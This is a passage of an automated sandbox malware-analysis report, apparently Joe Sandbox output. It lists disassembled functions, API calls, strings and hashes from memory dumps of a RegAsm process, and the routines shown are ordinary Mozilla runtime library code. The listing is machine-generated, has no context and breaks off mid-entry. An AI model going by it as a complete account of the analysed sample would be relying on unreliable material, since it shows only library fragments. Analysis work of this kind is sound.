                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                    • String ID:
                                                                                    • API String ID: 2666944752-0
                                                                                    • Opcode ID: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                                    • Instruction ID: 4d10ac50577aada7d362b61e3a0208b1fa88210924dcbc24274bf3900a8d925e
                                                                                    • Opcode Fuzzy Hash: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                                    • Instruction Fuzzy Hash: 03218D742006018FEB24DB64D888E5AB7B5FF4430CF14482DE65B93B41EB35F959CB65
                                                                                    Function 6CC41640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC41699
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416CB
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416D7
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416DE
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416E5
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416EC
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC416F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                    • String ID:
                                                                                    • API String ID: 375572348-0
                                                                                    • Opcode ID: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                                    • Instruction ID: 2925a08fddee8f5a54bbaee1171f1445e7a55aefe934bad04d5e26a7ccde79d0
                                                                                    • Opcode Fuzzy Hash: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                                    • Instruction Fuzzy Hash: 8A21D5B07402086FEB115BA8CC85FFB737CEF86704F008568F6459B280D678DD5486A1
                                                                                    Function 6CC7F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 1579816589-753366533
                                                                                    • Opcode ID: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                                    • Instruction ID: 4778df622c67525bb7c54f3533e28710fa10add5ef69b097b7c5efe91115fbe4
                                                                                    • Opcode Fuzzy Hash: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                                    • Instruction Fuzzy Hash: 7311A379201205AFCB54AFA9C9989A5B779FF86758B100016FA0587F01EB71EC21CBB4
                                                                                    Function 6CC42070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC42124
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                    • API String ID: 4190559335-2476802802
                                                                                    • Opcode ID: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                                    • Instruction ID: cdf4e73a16d7355498c12083d25a2eb043f2d541ade559201004c174f854c738
                                                                                    • Opcode Fuzzy Hash: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                                    • Instruction Fuzzy Hash: 3A216A7A200209EFDF118F99DD99D9A3BB6FB4A325F008018FA0592710E7719866DF65
                                                                                    Function 6CC41FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC41FDE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC41FFD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC42011
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC42059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                    • API String ID: 4190559335-2197658831
                                                                                    • Opcode ID: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                                    • Instruction ID: 7bb09187a104818e4711fcb221c36e0437221380d3f725931d81ba8d7a227d7c
                                                                                    • Opcode Fuzzy Hash: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                                    • Instruction Fuzzy Hash: 75117C7C201204AFDF20CF95CAA9E967BB9EF8635AF008029F905D3750E731A805DB65
                                                                                    Function 6CC40EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC6D9F0,00000000), ref: 6CC40F1D
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC40F3C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC40F50
                                                                                    • FreeLibrary.KERNEL32(?,6CC6D9F0,00000000), ref: 6CC40F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                    • API String ID: 4190559335-2063391169
                                                                                    • Opcode ID: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                                    • Instruction ID: 95b6fa3e6f6fb75e1b225d5c36bb87106c8efdef1d3c7919324f75b502647d18
                                                                                    • Opcode Fuzzy Hash: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                                    • Instruction Fuzzy Hash: A611527D7452819FEF00DFE9CA58A863774FB9A326F008629ED0592B41F770A409CA69
                                                                                    Function 6CC7F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 2848912005-2840072211
                                                                                    • Opcode ID: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                                    • Instruction ID: 59aec5b42fcf22e7c4658734fbb2c6a3f8a71c18cde73d1b74f3551bc0d374ee
                                                                                    • Opcode Fuzzy Hash: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                                    • Instruction Fuzzy Hash: 16F0547D7002049FDE106BE9D89895AB77DEB8629DF000055FA0593B11EB759C058B79
                                                                                    Function 6CC40E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6CC40DF8), ref: 6CC40E82
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC40EA1
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC40EB5
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC40EC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                    • API String ID: 391052410-1680159014
                                                                                    • Opcode ID: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                                    • Instruction ID: 397ae4df68db93a2b021eb2f472b8f9483f39ca12a48b097a7c036618861d6f6
                                                                                    • Opcode Fuzzy Hash: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                                    • Instruction Fuzzy Hash: ED01F67C7403829FEF02CFE9D998F4637B5F756319F1085A9E941A2B80F774AC148A1A
                                                                                    Function 6CC7F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 2848912005-753366533
                                                                                    • Opcode ID: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                                    • Instruction ID: 955aa761d4daec9be374b1bbd7e1032767be0795b111b2fa66af0dd0ca2c9426
                                                                                    • Opcode Fuzzy Hash: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                                    • Instruction Fuzzy Hash: 3BF0547D200244AFDB106BE9889895AB77DEF8629DF000055FA0593B51EB759C058B79
                                                                                    Function 6CC705F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC705FB
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC70616
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC331A7), ref: 6CC7061C
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC331A7), ref: 6CC70627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _writestrlen
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 2723441310-2186867486
                                                                                    • Opcode ID: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                                    • Instruction ID: 8448eb741d95dbd6a7c897f767ed284fa9503f13eda64439af8da0f14e1fa635
                                                                                    • Opcode Fuzzy Hash: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                                    • Instruction Fuzzy Hash: CCE08CE2A0201037F5142296AC8ADFB761CDBC6234F080039FD1D82301F94BAD1A51F6
                                                                                    Function 6CC405F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                                    • Instruction ID: 32884f1deb3cd39dbef57196997e50be86062bd21152c29875512aa4b00f484b
                                                                                    • Opcode Fuzzy Hash: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                                    • Instruction Fuzzy Hash: 5FA148B4A00745CFDB24CF69C594A9AFBF1BF89304F44866ED84A97B01E730A945CFA0
                                                                                    Function 6CC914A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC914C5
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC914E2
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC91546
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6CC915BA
                                                                                    • free.MOZGLUE(?), ref: 6CC916B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                    • String ID:
                                                                                    • API String ID: 1909280232-0
                                                                                    • Opcode ID: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                                    • Instruction ID: 8e26460293ed9733fbf94ea2a8bb779337280dd7279f523cafbead84053ff015
                                                                                    • Opcode Fuzzy Hash: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                                    • Instruction Fuzzy Hash: 6E61EE76A017409FDB118F29C880BDEBBB4BF89308F45851CED8A57711EB30E959CB91
                                                                                    Function 6CDBCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CDBC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CDBDAE2,?), ref: 6CDBC6C2
                                                                                    • PR_Now.NSS3 ref: 6CDBCD35
                                                                                      • Part of subcall function 6CE19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CE60A27), ref: 6CE19DC6
                                                                                      • Part of subcall function 6CE19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CE60A27), ref: 6CE19DD1
                                                                                      • Part of subcall function 6CE19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE19DED
